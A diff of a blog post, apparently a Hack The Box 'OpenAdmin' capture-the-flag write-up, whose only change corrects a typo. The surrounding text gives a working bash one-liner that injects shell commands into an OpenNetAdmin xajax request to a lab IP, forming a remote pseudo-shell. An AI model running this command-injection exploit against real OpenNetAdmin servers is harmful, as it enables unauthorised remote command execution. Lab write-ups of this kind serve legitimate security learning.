dvardoo/dvardoo.github.io/_posts/2020-09-17-htb-openadmin.markdown

 done
 ~~~

-By modifying the URL-part of the exploit and ponting it to the actual IP we can get a shell.
+By modifying the URL-part of the exploit and pointing it to the actual IP we can get a shell.
 Here I ran into some issues with the exploit as it would not run because of end of line characters.
 After trying a few times I made it into a working oneliner:

 ~~~
 $ while true;do echo -n "$ "; read cmd;curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1;done